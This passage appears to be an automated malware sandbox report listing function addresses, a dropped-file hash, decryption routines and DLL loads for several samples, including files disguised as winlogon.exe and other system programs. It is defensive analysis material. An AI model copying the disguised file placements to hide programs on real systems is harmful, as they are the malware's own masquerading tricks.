Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BABC350 8_2_00007FFD9BABC350
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB8E70 8_2_00007FFD9BAB8E70
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB1222 8_2_00007FFD9BAB1222
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB8E7F 8_2_00007FFD9BAB8E7F
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAC48EE 8_2_00007FFD9BAC48EE
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC2E842 8_2_00007FFD9BC2E842
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC2DA96 8_2_00007FFD9BC2DA96
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC3111B 8_2_00007FFD9BC3111B
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Code function: 14_2_00007FFD9BA91222 14_2_00007FFD9BA91222
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Code function: 15_2_00007FFD9BAC1222 15_2_00007FFD9BAC1222
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 32_2_00007FFD9BAB1222 32_2_00007FFD9BAB1222
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 33_2_00007FFD9BAB1222 33_2_00007FFD9BAB1222
Source: C:\Recovery\winlogon.exe Code function: 34_2_00007FFD9BAB1222 34_2_00007FFD9BAB1222
Source: C:\Recovery\winlogon.exe Code function: 35_2_00007FFD9BAB1222 35_2_00007FFD9BAB1222
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 40_2_00007FFD9BAB1222 40_2_00007FFD9BAB1222
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Code function: 42_2_00007FFD9BAD1222 42_2_00007FFD9BAD1222
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC8028 43_2_00007FFD9BAC8028
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BACC425 43_2_00007FFD9BACC425
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BACC350 43_2_00007FFD9BACC350
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC8E70 43_2_00007FFD9BAC8E70
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC1222 43_2_00007FFD9BAC1222
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC8E7F 43_2_00007FFD9BAC8E7F
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAD48EE 43_2_00007FFD9BAD48EE
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\BudDliLc.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: String function: 0032FFD0 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: String function: 0032FEFC appears 42 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: String function: 003307A0 appears 31 times
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: String function: 00A3FFD0 appears 56 times
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: String function: 00A407A0 appears 31 times
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: String function: 00A3FEFC appears 42 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: String function: 0073EB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: String function: 0073F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: String function: 0073EC50 appears 56 times
Tries to load missing DLLs
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: gpapi.dll Jump to behavior
